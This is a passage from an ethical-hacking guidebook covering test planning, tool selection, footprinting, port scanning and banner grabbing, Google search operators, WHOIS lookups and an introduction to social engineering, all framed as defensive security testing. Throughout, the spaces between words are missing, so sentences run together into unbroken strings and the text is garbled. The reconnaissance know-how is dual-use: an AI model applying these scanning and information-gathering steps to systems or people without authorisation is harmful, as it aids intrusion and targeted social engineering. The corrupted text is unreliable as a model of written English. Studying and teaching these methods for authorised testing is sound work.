Havingsaidthis,ifyoudiscoveramajorhole,Irecommendcontactingtherightpeopleassoonaspossiblesothattheycanbeginfixingtheissuerightaway.Therightpeoplemaybesoftwaredevelopers,productorprojectmanagers,orevenCIOs.Ifyouwaitafewdaysorweeks,someonemightexploitthevulnerabilityandcausedamagethatcould’vebeenprevented.
MakingsillyassumptionsYou’veheardaboutwhatyoumakeofyourselfwhenyouassumethings.Evenso,youmakeassumptionswhenyoutestyoursystems.Herearesomeexamplesofthoseassumptions:
Allofthecomputers,networks,applications,andpeopleareavailablewhenyou’retesting.Youhaveallthepropertestingtools.Thetestingtoolsyouusewillminimizethechancesofcrashingthesystemsyoutest.Youunderstandthelikelihoodthatexistingvulnerabilitieswerenotfoundorthatyouusedyourtestingtoolsimproperly.Youknowtherisksofyourtests.
Documentallassumptions.Youwon’tregretit.
SelectingSecurityAssessmentToolsWhichsecurityassessmenttoolsyouneeddependonthetestsyou’regoingtorun.Youcanperformsomeethicalhackingtestswithapairofsneakers,atelephone,andabasicworkstationonthenetwork,butcomprehensivetestingiseasierwithgood,dedicatedtools.
Thetoolsdiscussedinthisbookarenotmalware.Thetoolsandeventheirwebsitesmaybeflaggedassuchbycertainanti-malwareandwebfilteringsoftwarebutthey’renot.ThetoolsIcoverarelegitimatetools—manyofwhichIhaveusedforyears.Ifyouexperiencetroubledownloading,installing,orrunningthetoolsIcoverinthisbook,youmayconsiderconfiguringyoursystemtoallowthemthroughorotherwisetrusttheirexecution.KeepinmindthatIcan’tmakeanypromises.UsechecksumswherepossiblebycomparingtheoriginalMD5orSHAchecksumwiththeoneyougetusingatoolsuchasCheckSumTool(http://sourceforge.net/projects/checksumtool).Acriminalcouldalwaysinjectmaliciouscodeintotheactualtools,sothere’snoguaranteeofsecurity.Youknewthatanyway,right?
Ifyou’renotsurewhattoolstouse,fearnot.ThroughoutthisbookIintroduceawidevarietyoftools—bothfreeandcommercial—thatyoucanusetoaccomplishyourtasks.Chapter1providesalistofcommercial,freeware,andopensourcetools.TheAppendixcontainsacomprehensivelistingoftoolsforyourreference.
It’simportanttoknowwhateachtoolcanandcan’tdoandhowtouseeachone.IsuggestreadingthemanualandotherHelpfiles.Unfortunately,sometoolshavelimiteddocumentation,whichcanbefrustrating.Youcansearchforumsandpostamessageifyou’rehavingtroublewithatool.
Securityvulnerabilityscanningandexploittoolscanbehazardoustoyournetwork’shealth.Becarefulwhenyouusethem.Alwaysmakesurethatyouunderstandwhateveryoptiondoesbeforeyouuseit.Tryyourtoolsontestsystemsifyou’renotsurehowtousethem.Evenifyouarefamiliarwiththem,thisprecautioncanhelppreventDoSconditionsandlossofdataonyourproductionsystems.
Ifyou’relikeme,youmaydespisesomefreewareandopensourcesecuritytools.ThereareplentythathavewastedhoursofmylifethatI’llnevergetback.Ifthesetoolsendupcausingyoumoreheadachesthanthey’reworth,ordon’tdowhatyouneedthemtodo,considerpurchasingcommercialalternatives.They’reofteneasiertouse
andtypicallygeneratebetterhigh-levelexecutivereports.Somecommercialtoolsareexpensivetoacquire,buttheireaseofuseandfunctionalityoftenjustifytheinitialandongoingcosts.Inmostsituationswithsecuritytools,yougetwhatyoupayfor.
HackingMethodologyInThisChapter
Examiningstepsforsuccessfulethicalhacking
GleaninginformationaboutyourorganizationfromtheInternet
Scanningyournetwork
Lookingforvulnerabilities
Beforeyoudiveinheadfirstwithyoursecuritytesting,it’scriticaltohaveamethodologytoworkfrom.Vulnerabilityassessmentsandpenetrationtestinginvolvesmorethanjustpokingandproddingasystemornetwork.Proventechniquescanhelpguideyoualongthehackinghighwayandensurethatyouendupattherightdestination.Usingamethodologythatsupportsyourtestinggoalsseparatesyoufromtheamateurs.Amethodologyalsohelpsensurethatyoumakethemostofyourtimeandeffort.
SettingtheStageforTestingInthepast,alotofsecurityassessmenttechniquesinvolvedmanualprocesses.Now,certainvulnerabilityscannerscanautomatevarioustasks,fromtestingtoreportingtoremediationvalidation(theprocessofdeterminingwhetheravulnerabilitywasfixed).Somevulnerabilityscannerscanevenhelpyoutakecorrectiveactions.Thesetoolsallowyoutofocusonperformingthetestsandlessonthespecificstepsinvolved.However,followingageneralmethodologyandunderstandingwhat’sgoingonbehindthesceneswillhelpyoufindthethingsthatreallymatter.
Thinklogically—likeaprogrammer,aradiologist,orahomeinspector—todissectandinteractwithallthesystemcomponentstoseehowtheywork.Yougatherinformation,ofteninmanysmallpieces,andassemblethepiecesofthepuzzle.YoustartatpointAwithseveralgoalsinmind,runyourtests(repeatingmanystepsalongtheway),andmovecloseruntilyoudiscoversecurityvulnerabilitiesatpointB.
Theprocessusedforsuchtestingisbasicallythesameastheoneamaliciousattackerwoulduse.Theprimarydifferenceslieinthegoalsandhowyouachievethem.Today’sattackscancomefromanyangleagainstanysystem,notjustfromtheperimeterofyournetworkandtheInternetasyoumighthavebeentaughtinthepast.Testeverypossibleentrypoint,includingpartner,vendor,andcustomernetworks,aswellashomeusers,wirelessnetworks,andmobiledevices.Anyhumanbeing,computersystem,orphysicalcomponentthatprotectsyourcomputersystems—bothinsideandoutsideyourbuildings—isfairgameforattack,anditneedstobetested,eventually.
Whenyoustartrollingwithyourtesting,youshouldkeepalogofthetestsyouperform,thetoolsyouuse,thesystemsyoutest,andyourresults.Thisinformationcanhelpyoudothefollowing:
Trackwhatworkedinprevioustestsandwhy.Helpprovewhatyoudid.Correlateyourtestingwithfirewallsandintrusionpreventionsystems(IPSs)andotherlogfilesiftroubleorquestionsarise.Documentyourfindings.
Inadditiontogeneralnotes,takingscreencapturesofyourresults(usingSnagit,Camtasia,orasimilartool)wheneverpossibleisveryhelpful.Theseshotscomeinhandylatershouldyouneedtoshowproofofwhatoccurred,andtheyalsowillbeusefulasyougenerateyourfinalreport.Also,dependingonthetoolsyouuse,thesescreencapturesmightbeyouronlyevidenceofvulnerabilitiesorexploitswhenitcomestimetowriteyourfinalreport.Chapter3liststhegeneral
stepsinvolvedincreatinganddocumentinganethicalhackingplan.
Yourmaintaskistofindthevulnerabilitiesandsimulatetheinformationgatheringandsystemcompromisescarriedoutbysomeonewithmaliciousintent.Thistaskcanbeapartialattackononecomputer,oritcanconstituteacomprehensiveattackagainsttheentirenetwork.Generally,youlookforweaknessesthatmalicioususersandexternalattackersmightexploit.You’llwanttoassessbothexternalandinternalsystems(includingprocessesandproceduresthatinvolvecomputers,networks,people,andphysicalinfrastructures).Lookforvulnerabilities;checkhowallyoursystemsinterconnectandhowprivatesystemsandinformationare(oraren’t)protectedfromuntrustedelements.
Thesestepsdon’tincludespecificinformationonthemethodsthatyouuseforsocialengineeringandassessingphysicalsecurity,butthetechniquesarebasicallythesame.IcoversocialengineeringandphysicalsecurityinmoredetailinChapters6and7,respectively.
Ifyou’reperformingasecurityassessmentforaclient,youmaygotheblindassessmentroute,whichmeansyoubasicallystartwithjustthecompanynameandnootherinformation.Thisblindassessmentapproachallowsyoutostartfromthegroundupandgivesyouabettersenseoftheinformationandsystemsthatmaliciousattackerscanaccesspublicly.Whetheryouchoosetoassessblindly(i.e.,covertly)orovertly,keepinmindthattheblindwayoftestingcantakelonger,andyoumayhaveanincreasedchanceofmissingsomesecurityvulnerabilities.It’snotmypreferredtestingmethod,butsomepeoplemayinsistonit.
Asasecurityprofessional,youmightnothavetoworryaboutcoveringyourtracksorevadingIPSsorrelatedsecuritycontrolsbecauseeverythingyoudoislegitimate.Butyoumightwanttotestsystemsstealthily.Inthisbook,Idiscusstechniquesthathackersusetoconcealtheiractionsandoutlinesomecountermeasuresforconcealmenttechniques.
SeeingWhatOthersSeeGettinganoutsidelookcanturnupatonofinformationaboutyourorganizationandsystemsthatotherscansee,andyoudosothroughaprocessoftencalledfootprinting.Here’showtogathertheinformation:
Useawebbrowsertosearchforinformationaboutyourorganization.Searchengines,suchasGoogleandBing,aregreatplacestostart.Runnetworkscans,probeopenports,andseekoutvulnerabilitiestodeterminespecificinformationaboutyoursystems.Asaninsider,youcanuseportscanners,networkdiscoverytools,andvulnerabilityscannerssuchasNmap,SoftPerfectNetworkScanner,andGFILanGuard,toseewhat’saccessibleandtowhom.
Whetheryousearchgenerallyorprobemoretechnically,limittheamountofinformationyougatherbasedonwhat’sreasonableforyou.Youmightspendanhour,aday,oraweekgatheringthisinformation.Howmuchtimeyouspenddependsonthesizeofyourorganizationandthecomplexityoftheinformationsystemsyou’retesting.
GatheringpublicinformationTheamountofinformationyoucangatheraboutanorganization’sbusinessandinformationsystemscanbestaggeringandisoftenwidelyavailableontheInternet.Yourjobistofindoutwhat’soutthere.Fromsocialmediatosearchenginestodedicatedintelligence-gatheringtools,youcangainquiteabitofinsightintonetworkandinformationvulnerabilitiesifyoulookintherightplaces.Thisinformationallowsmaliciousattackersandemployeestogainpotentiallysensitiveinformationandtargetspecificareasoftheorganization,includingsystems,departments,andkeyindividuals.IcoverinformationgatheringindetailinChapter5.
ScanningSystemsActiveinformationgatheringproducesmoredetailsaboutyournetworkandhelpsyouseeyoursystemsfromanattacker’sperspective.Forinstance,youcan:
UsetheinformationprovidedbyWHOISsearchestotestothercloselyrelatedIPaddressesandhostnames.Whenyoumapoutandgatherinformationaboutanetwork,youseehowitssystemsarelaidout.ThisinformationincludesdeterminingIPaddresses,hostnames(typicallyexternalbutoccasionallyinternal),runningprotocols,openports,availableshares,andrunningservicesandapplications.Scaninternalhostswhenandwheretheyarewithinthescopeofyourtesting.(Tip:Theyreallyoughttobe.)Thesehostsmightnotbevisibletooutsiders(atleastyouhopethey’renot),butyouabsolutelyneedtotestthemtoseewhatrogue(orevencuriousormisguided)employees,otherinsiders,andevenmalwarecontrolledbyoutsidepartiescanaccess.Aworst-casesituationisthattheintruderhassetupshopontheinside.Justtobesafe,examineyourinternalsystemsforweaknesses.
Ifyou’renotcompletelycomfortablescanningyoursystems,considerfirstusingalabwithtestsystemsorasystemrunningvirtualmachinesoftware,suchasthefollowing:
VMwareWorkstationPro(www.vmware.com/products/workstation/overview.html)VirtualBox,theopensourcevirtualmachinealternativethatworksverywell(www.virtualbox.org)
HostsScananddocumentspecifichoststhatareaccessiblefromtheInternetandyourinternalnetwork.StartbypingingeitherspecifichostnamesorIPaddresseswithoneofthesetools:
Thebasicpingutilitythat’sbuiltintoyouroperatingsystemAthird-partyutilitythatallowsyoutopingmultipleaddressesatthesametime,suchasNetScanToolsPro(www.netscantools.com)forWindowsandfping(http://fping.sourceforge.net)forLinux
ThesiteWhatIsMyIP.com(www.whatismyip.com)showshowyourgatewayIPaddressappearsontheInternet.Justbrowsetothatsite,andyourpublicIPaddress(yourfirewallorrouter—preferablynotyourlocalcomputer)appears.ThisinformationgivesyouanideaoftheoutermostIPaddressthattheworldsees.
OpenportsScanforopenportsbyusingnetworkscanningandanalysistools:
ScannetworkportswithNetScanToolsProorNmap(http://nmap.org).SeeChapter9fordetails.Monitornetworktrafficwithanetworkanalyzer,suchasOmniPeek(www.savvius.com)orWireshark(www.wireshark.com).Icoverthistopicinvariouschaptersthroughoutthisbook.
Scanninginternallyiseasy.SimplyconnectyourPCtothenetwork,loadthesoftware,andfireaway.JustbeawareofnetworksegmentationandinternalIPSsthatmayimpedeyourwork.Scanningfromoutsideyournetworktakesafewmoresteps,butitcanbedone.Theeasiestwaytoconnectandgetanoutside-inperspectiveistoassignyourcomputerapublicIPaddressandplugthatsystemintoaswitchonthepublicsideofyourfirewallorrouter.Physically,thecomputerisn’tontheInternetlookingin,butthistypeofconnectionworksjustthesameaslongasit’soutsideyournetworkperimeter.Youcanalsodothisoutside-inscanfromhomeorfromaremoteofficelocation.
DeterminingWhat’sRunningonOpenPorts
Asasecurityprofessional,youneedtogatherthethingsthatcountwhenscanningyoursystems.Youcanoftenidentifythefollowinginformation:
Protocolsinuse,suchasIP,domainnamesystem(DNS),andNetBIOS(NetworkBasicInput/OutputSystem)Servicesrunningonthehosts,suchase-mail,webservers,anddatabaseapplicationsAvailableremoteaccessservices,suchasRemoteDesktopProtocol(RDP),telnet,andSecureShell(SSH)VirtualPrivateNetwork(VPN)services,suchasPPTP,SSL/TLS,andIPsecPermissionsandauthenticationrequirementsfornetworkshares
Youcanlookforthefollowingsamplingofopenports(yournetwork-scanningprogramreportstheseasaccessibleoropen):
Ping(ICMPecho)replies,showingthatICMPtrafficisallowedtoandfromthehostTCPport21,showingthatFTPisrunningTCPport23,showingthattelnetisrunningTCPports25or465(SMTPandSMPTS),110or995(POP3andPOP3S),or143or993(IMAPandIMAPS),showingthatane-mailserverisrunningTCP/UDPport53,showingthataDNSserverisrunningTCPports80,443,and8080,showingthatawebserverorwebproxyisrunningTCP/UDPports135,137,138,139and,especially,445,showingthataWindowshostisrunning
Thousandsofportscanbeopen—65,534eachforbothTCP(TransmissionControlProtocol)andUDP(UserDatagramProtocol),tobeexact.Icovermanypopularportnumberswhendescribingsecuritychecksthroughoutthisbook.Acontinuallyupdatedlistingofallwell-knownportnumbers(ports0–1023)andregisteredportnumbers(ports1024–49151),withtheirassociatedprotocolsandservices,islocatedatwww.iana.org/assignments/service-names-port-numbers/service-names-port-
numbers.txt.Youcanalsoperformaportnumberlookupatwww.cotse.com/cgi-bin/port.cgi.
Ifaservicedoesn’trespondonaTCPorUDPport,thatdoesn’tmeanit’snot
running.Youmayhavetodigfurthertofindout.
Ifyoudetectawebserverrunningonthesystemthatyoutest,youcancheckthesoftwareversionbyusingoneofthefollowingmethods:
Typethesite’snamefollowedbyapagethatyouknowdoesn’texist,suchaswww.your_domain.com/1234.html.Manywebserversreturnanerrorpageshowingdetailedversioninformation.UseNetcraft’sWhat’sthatsiterunning?searchutility(www.netcraft.com),whichconnectstoyourserverfromtheInternetanddisplaysthewebserverversionandoperatingsystem,asshowninFigure4-1.
Figure4-1:Netcraft’swebserverversionutility.
Youcandigdeeperformorespecificinformationonyourhosts:
NMapWin(http://sourceforge.net/projects/nmapwin)candeterminethesystemOSversion.Anenumerationtool(suchasSoftPerfectNetworkScanneratwww.softperfect.com/products/networkscanner)canextractusers,groups,andfileandsharepermissionsdirectlyfromWindows.Manysystemsreturnusefulbannerinformationwhenyouconnecttoaserviceorapplicationrunningonaport.Forexample,ifyoutelnettoane-mailserveronport25byenteringtelnetmail.your_domain.com25atacommandprompt,youmay
seesomethinglikethis:220mail.your_domain.comESMTPall_the_version_info_
you_need_to_hackReady
Moste-mailserversreturndetailedinformation,suchastheversionandthecurrentservicepackinstalled.Afteryouhavethisinformation,you(andthebadguys)candeterminethevulnerabilitiesofthesystemfromsomeofthewebsiteslistedinthenextsection.
Ane-mailtoaninvalidaddressmightreturnwithdetailede-mailheaderinformation.Abouncedmessageoftendisclosesinformationthatcanbeusedagainstyou,includinginternalIPaddressesandsoftwareversions.OncertainWindowssystems,youcanusethisinformationtoestablishunauthenticatedconnectionsandsometimesevenmapdrives.IcovertheseissuesinChapter12.
AssessingVulnerabilitiesAfterfindingpotentialsecurityholes,thenextstepistoconfirmwhetherthey’reindeedvulnerabilitiesinthecontextofyourenvironment.Beforeyoutest,performsomemanualsearching.Youcanresearchwebsitesandvulnerabilitydatabases,suchasthese:
CommonVulnerabilitiesandExposures(http://cve.mitre.org/cve)US-CERTVulnerabilityNotesDatabase(www.kb.cert.org/vuls)NISTNationalVulnerabilityDatabase(http://nvd.nist.gov)
Thesesiteslistknownvulnerabilities—atleasttheformallyclassifiedones.AsIexplaininthisbook,youseethatmanyothervulnerabilitiesaremoregenericinnatureandcan’teasilybeclassified.Ifyoucan’tfindavulnerabilitydocumentedononeofthesesites,searchthevendor’ssite.Youcanalsofindalistofcommonlyexploitedvulnerabilitiesatwww.sans.org/critical-security-controls.ThissitecontainstheSANSCriticalSecurityControlsconsensuslist,whichiscompiledandupdatedbytheSANSorganization.
Ifyoudon’twanttoresearchyourpotentialvulnerabilitiesandcanjumprightintotesting,youhaveacoupleofoptions:
Manualassessment:Youcanassessthepotentialvulnerabilitiesbyconnectingtotheportsthatareexposingtheserviceorapplicationandpokingaroundintheseports.Youshouldmanuallyassesscertainsystems(suchaswebapplications).Thevulnerabilityreportsintheprecedingdatabasesoftendisclosehowtodothis—atleastgenerally.Ifyouhavealotoffreetime,performingthesetestsmanuallymightworkforyou.Automatedassessment:Manualassessmentsareagreatwaytolearn,butpeopleusuallydon’thavethetimeformostmanualsteps.Ifyou’relikeme,you’llscanforvulnerabilitiesautomaticallywhenyoucanandthendigaroundmanuallyasneeded.
Manygreatvulnerabilityassessmentscannerstestforflawsonspecificplatforms(suchasWindowsandLinux)andtypesofnetworks(eitherwiredorwireless).TheytestforspecificsystemvulnerabilitiesandsomefocusaroundstandardsliketheSANSCriticalSecurityControlsandtheOpenWebApplicationSecurityProject(www.owasp.org).Somescannerscanmapoutthebusinesslogicwithinawebapplication;otherscanmapoutaviewofthenetwork;otherscanhelpsoftwaredeveloperstestforcodeflaws.Thedrawbacktothesetoolsisthattheyfindonlyindividualvulnerabilities;theyoftendon’tnecessarilyaggregateandcorrelatevulnerabilitiesacrossanentirenetwork.That’swhereyourskills,andthemethodologiesIshareinthisbook,comeintoplay!
OneofmyfavoritesecuritytoolsisavulnerabilityscannercalledNexposebyRapid7(www.rapid7.com/products/nexpose).It’sbothaportscannerandvulnerabilityassessmenttool,anditoffersagreatdealofhelpforvulnerabilitymanagement.Youcanrunone-timescansimmediatelyorschedulescanstorunonaperiodicbasis.
Aswithmostgoodsecuritytools,youpayforNexpose.Itisn’ttheleastexpensivetool,butyoudefinitelygetwhatyoupayfor,especiallywhenitcomestootherstakingyouseriously(suchaswhenPCIDSScomplianceisrequiredofyourbusiness).There’salsoafreeversionNexposedubbedtheCommunityEditionforscanningsmallernetworkswithlessfeatures.AdditionalvulnerabilityscannersthatworkwellincludeQualysGuard(www.qualys.com)andGFILanGuard(www.gfi.com/products-and-solutions/network-security-solutions)
AssessingvulnerabilitieswithatoollikeNexposerequiresfollow-upexpertise.Youcan’trelyonthescannerresultsalone.Youmustvalidatethevulnerabilitiesitreports.Studythereportstobaseyourrecommendationsonthecontextandcriticalityofthetestedsystems.
PenetratingtheSystemYoucanuseidentifiedsecurityvulnerabilitiestodothefollowing:
Gainfurtherinformationaboutthehostanditsdata.Obtainaremotecommandprompt.Startorstopcertainservicesorapplications.Accessothersystems.Disableloggingorothersecuritycontrols.Capturescreenshots.Accesssensitivefiles.Sendane-mailastheadministrator.PerformSQLinjection.LaunchaDoSattack.Uploadafileorcreateabackdooruseraccountprovingtheexploitationofavulnerability.
Metasploit(www.metasploit.com)isgreatforexploitingmanyofthevulnerabilitiesyoufindandallowsyoutofullypenetratemanytypesofsystems.Ideally,you’vealreadymadeyourdecisiononwhethertofullyexploitthevulnerabilitiesyoufind.Youmightwanttoleavewellenoughalonebyjustdemonstratingtheexistenceofthevulnerabilitiesandnotactuallyexploitingthem.
Ifyouwanttofurtherdelveintotheethicalhackingmethodology,IrecommendyoucheckouttheOpenSourceSecurityTestingMethodologyManual(www.isecom.org/research/osstmm.html)formoreinformation.
PuttingSecurityTestinginMotion
Findouthowtolookforthemostcommonsecurityflawsinafreearticleatwww.dummies.com/extras/hacking.
Inthispart…Letthegamesbegin!You’vewaitedlongenough—now’sthetimetostarttestingthesecurityofyoursystems.Butwheredoyoustart?HowaboutwithyourthreePs—yourpeople,yourphysicalsystems,andyourpasswords?Theseare,afterall,threeofthemosteasilyandcommonlyattackedtargetsinyourorganization.
Thispartstartswithadiscussionofhackingpeople(otherwiseknownassocialengineering).Itthengoesontolookatphysicalsecurityvulnerabilities.Ofcourse,I’dberemissinapartaboutpeopleifIskippedpasswords,soIcoverthetechnicaldetailsoftestingthoseaswell.Thisisagreatwaytogettheballrollingtowarmyouupforthemorespecificsecuritytestslaterinthebook.
InformationGatheringInThisChapter
GleaninginformationaboutyourorganizationfromtheInternet
Webresources
Seekingoutinformationyou(andothers)canbenefitfrom
Oneofthemostimportantaspectsindetermininghowyourorganizationisatriskistofindoutwhatinformationispublicallyavailableaboutyourbusinessandyoursystems.GatheringthisinformationissuchanimportantpartofyouroverallmethodologythatIthoughtthesubjectdeservesadedicatedchapter.Inthischapter,Ioutlinesomefreeandeasywaystoseewhattheworldseesaboutyouandyourorganization.Youmaybetemptedtobypassthisexerciseinfavorofthecoolerandsexiertechnicalsecurityflaws,butdon’tfallintothetrap.Gatheringthistypeofinformationiscriticalandoftenwheremostsecuritybreachesbegin.
GatheringPublicInformationTheamountofinformationyoucangatheraboutanorganization’sbusinessandinformationsystemsthatiswidelyavailableontheInternetisstaggering.Toseeforyourself,thetechniquesoutlinedinthefollowingsectionscanbeusedtogatherinformationaboutyourownorganization.
SocialmediaSocialmediasitesarethenewmeansforbusinessesinteractingonline.Perusingthefollowingsitescanprovideuntolddetailsonanygivenbusinessanditspeople:
Facebook(www.facebook.com)LinkedIn(www.linkedin.com)Twitter(https://twitter.com)YouTube(www.youtube.com)
Aswe’veallwitnessed,employeesareoftenveryforthcomingaboutwhattheydoforwork,detailsabouttheirbusiness,andevenwhattheythinkabouttheirbosses—especiallyafterthrowingbackafewwhentheirsocialfilterhasgoneofftrack!I’vealsofoundinterestinginsightbasedonwhatex-employeessayabouttheirformeremployersatGlassdoor(www.glassdoor.com).
WebsearchPerformingawebsearchorsimplybrowsingyourorganization’swebsitecanturnupthefollowinginformation:
EmployeenamesandcontactinformationImportantcompanydatesIncorporationfilingsSECfilings(forpubliccompanies)Pressreleasesaboutphysicalmoves,organizationalchanges,andnewproductsMergersandacquisitionsPatentsandtrademarksPresentations,articles,webcasts,orwebinars
Bing(www.bing.com)andGoogle(www.google.com)ferretoutinformation—ineverythingfromwordprocessingdocumentstographicsfiles—onanypubliclyaccessiblecomputer.Andthey’refree.Googleismyfavorite.Entire
bookshavebeenwrittenaboutusingGoogle,soexpectanycriminalhackertobequiteexperiencedinusingthistool,includingagainstyou.(SeeChapter15formoreaboutGooglehacking.)
WithGoogle,youcansearchtheInternetinseveralways:
Typingkeywords.Thiskindofsearchoftenrevealshundredsandsometimesmillionsofpagesofinformation—suchasfiles,phonenumbers,andaddresses—thatyouneverguessedwereavailable.Performingadvancedwebsearches.Google’sadvancedsearchoptionscanfindsitesthatlinkbacktoyourcompany’swebsite.Thistypeofsearchoftenrevealsalotofinformationaboutpartners,vendors,clients,andotheraffiliations.Usingswitchestodigdeeperintoawebsite.Forexample,ifyouwanttofindacertainwordorfileonyourwebsite,simplyenteralinelikeoneofthefollowingintoGoogle:
site:www.your_domain.comkeyword
site:www.your_domain.comfilename
YoucanevendoagenericfiletypesearchacrosstheentireInternettoseewhatturnsup,suchasthis:
filetype:swfcompany_name
UsetheprecedingsearchtofindFlash.swffiles,whichcanbedownloadedanddecompiledtorevealsensitiveinformationthatcanbeusedagainstyourbusiness,asIcoverindetailinChapter15.
UsethefollowingsearchtohuntforPDFdocumentsthatmightcontainsensitiveinformationthatcanbeusedagainstyourbusiness:
filetype:pdfcompany_nameconfidential
WebcrawlingWeb-crawlingutilities,suchasHTTrackWebsiteCopier(www.httrack.com),canmirroryourwebsitebydownloadingeverypublicly-accessiblefilefromit,similartohowawebvulnerabilityscannercrawlsthewebsiteit’stesting.Youcantheninspectthatcopyofthewebsiteoffline,diggingintothefollowing:
ThewebsitelayoutandconfigurationDirectoriesandfilesthatmightnototherwisebeobviousorreadilyaccessibleTheHTMLandscriptsourcecodeofwebpagesCommentfields
Commentfieldsoftencontainusefulinformationsuchasnamesande-mailaddressesofthedevelopersandinternalITpersonnel,servernames,softwareversions,internalIPaddressingschemes,andgeneralcommentsabouthowthecodeworks.Incaseyou’reinterested,youcanpreventsometypesofwebcrawlingbycreatingDisallow
entriesinyourwebserver’srobots.txtfileasoutlinedatwww.w3.org/TR/html4/appendix/notes.html.Youcanevenenablewebtarpittingincertainfirewallsandintrusionpreventionsystems(IPSs).However,crawlers(andattackers)thataresmartenoughcanfindwaysaroundthesecontrols.
ContactinformationfordevelopersandITpersonnelisgreatforsocialengineeringattacks.IcoversocialengineeringinChapter6.
WebsitesThefollowingwebsitesmayprovidespecificinformationaboutanorganizationanditsemployees:
Governmentandbusinesswebsites:www.hoovers.comandhttp://finance.yahoo.comgivedetailedinformationaboutpubliccompanies.www.sec.gov/edgar.shtmlshowsSECfilingsofpubliccompanies.www.uspto.govofferspatentandtrademarkregistrations.Thewebsiteforyourstate’sSecretaryofStateorsimilarorganizationcanofferincorporationandcorporateofficerinformation.
Backgroundchecksandotherpersonalinformation,fromwebsitessuchas:LexisNexis.com(www.lexisnexis.com)ZabaSearch(www.zabasearch.com)
MappingtheNetworkAspartofmappingoutyournetwork,youcansearchpublicdatabasesandresourcestoseewhatotherpeopleknowaboutyoursystems.
WHOISThebeststartingpointistoperformaWHOISlookupbyusinganyoneofthetoolsavailableontheInternet.Incaseyou’renotfamiliar,WHOISisaprotocolyoucanusetoqueryonlinedatabasessuchasDNSregistriestolearnmoreaboutdomainnamesandIPaddressblocks.YoumayhaveusedWHOIStocheckwhetheraparticularInternetdomainnameisavailable.
Forsecuritytesting,WHOISprovidesthefollowinginformationthatcangiveahackeraleguptostartasocialengineeringattackortoscananetwork:
Internetdomainnameregistrationinformation,suchascontactnames,phonenumbers,andmailingaddressesDNSserversresponsibleforyourdomain
YoucanlookupWHOISinformationatoneofthefollowingplaces:
WHOIS.net(www.whois.net)Adomainregistrar’ssite,suchaswww.godaddy.comYourISP’stechnicalsupportsite
TwoofmyfavoriteWHOIStoolwebsitesareDNSstuff(www.dnsstuff.com)andMXToolBox(www.mxtoolbox.com).Forexample,youcanrunDNSqueriesdirectlyfromwww.mxtoolbox.comtodothefollowing:
Displaygeneraldomain-registrationinformationShowwhichhosthandlese-mailforadomain(theMailExchangerorMXrecord)MapthelocationofspecifichostsDeterminewhetherthehostislistedoncertainspamblacklists
AfreesiteyoucanuseformorebasicInternetdomainqueriesishttp://dnstools.com.AnothercommercialproductcalledNetScanToolsPro(www.netscantools.com)isexcellentatgatheringsuchinformation.IcoverthistoolandothersinmoredetailinChapter9.
Thefollowinglistshowsvariouslookupsitesforothercategories:
U.S.Government:www.dotgov.gov/portal/web/dotgov/whoisAFRINIC:www.afrinic.net(RegionalInternetRegistryforAfrica)
APNIC:www.apnic.net/apnic-info/whois_search(RegionalInternetRegistryfortheAsiaPacificRegion)ARIN:http://whois.arin.net/ui(RegionalInternetRegistryforNorthAmerica,aportionoftheCaribbean,andsubequatorialAfrica)LACNIC:www.lacnic.net/en(LatinAmericanandCaribbeanInternetAddressesRegistry)RIPENetworkCoordinationCentre:https://apps.db.ripe.net/search/query.html(Europe,CentralAsia,Africancountriesnorthoftheequator,andtheMiddleEast)
Ifyou’renotsurewheretolookforaspecificcountry,www.nro.net/about-the-nro/list-of-country-codes-and-rirs-ordered-by-country-codehasareferenceguide.
PrivacypoliciesCheckyourwebsite’sprivacypolicy.Agoodpracticeistoletyoursite’susersknowwhatinformationiscollectedandhowit’sbeingprotected,butnothingmore.I’veseenmanyprivacypoliciesthatdivulgealotoftechnicaldetailsonsecurityandrelatedsystemsthatshouldnotbemadepublic.
Makesurethepeoplewhowriteyourprivacypolicies(oftennontechnicallawyers)don’tdivulgedetailsaboutyourinformationsecurityinfrastructure.BecarefultoavoidtheexampleofanInternetstart-upbusinessmanwhooncecontactedmeaboutabusinessopportunity.Duringtheconversation,hebraggedabouthiscompany’ssecuritysystemsthatensuredtheprivacyofclientinformation(orsohethought).Iwenttohiswebsitetocheckouthisprivacypolicy.Hehadpostedthebrandandmodeloffirewallhewasusing,alongwithothertechnicalinformationabouthisnetworkandsystemarchitecture.Thistypeofinformationcouldcertainlybeusedagainsthimbythebadguys.Notagoodidea.
SocialEngineeringInThisChapter
Understandingsocialengineering
Examiningtheramificationsofsocialengineering
Performingsocialengineeringtests
Protectingyourorganizationagainstsocialengineering
Socialengineeringtakesadvantageoftheweakestlinkinanyorganization’sinformationsecuritydefenses:people.Socialengineeringis“peoplehacking”andinvolvesmaliciouslyexploitingthetrustingnatureofhumanbeingstoobtaininformationthatcanbeusedforpersonalgain.
Socialengineeringisoneofthetoughesthackstoperpetratebecauseittakesbravadoandskilltocomeacrossastrustworthytoastranger.It’salsobyfarthetoughestthingtoprotectagainstbecausepeoplewhoaremakingtheirownsecuritydecisionsareinvolved.Inthischapter,Iexploretheconsequencesofsocialengineering,techniquesforyourownethicalhackingefforts,andspecificcountermeasurestodefendagainstsocialengineering.
IntroducingSocialEngineeringInasocialengineeringscenario,thosewithillintentposeassomeoneelsetogaininformationtheylikelycouldn’taccessotherwise.Theythentaketheinformationtheyobtainfromtheirvictimsandwreakhavoconnetworkresources,stealordeletefiles,andevencommitcorporateespionageorsomeotherformoffraudagainsttheorganizationtheyattack.Socialengineeringisdifferentfromphysicalsecurityexploits,suchasshouldersurfinganddumpsterdiving,butthetwotypesofhackingarerelatedandoftenareusedintandem.
Herearesomeexamplesofsocialengineering:
“Supportpersonnel”claimingthattheyneedtoinstallapatchornewversionofsoftwareonauser’scomputer,talktheuserintodownloadingthesoftware,andobtainremotecontrolofthesystem.“Vendors”claimingtoneedtoupdatetheorganization’saccountingpackageorphonesystem,askfortheadministratorpassword,andobtainfullaccess.“Employees”notifyingthesecuritydeskthattheyhavelosttheiraccessbadgetothedatacenter,receiveasetofkeysfromsecurity,andobtainunauthorizedaccesstophysicalandelectronicinformation.Phishinge-mailssentbywhomevertogatheruserIDsandpasswordsofunsuspectingrecipients.Theseattackscanbegenericinnatureormoretargeted—somethingcalledspear-phishingattacks.Thecriminalsthenusethosepasswordstoinstallmalware,gainaccesstothenetwork,captureintellectualproperty,andmore.
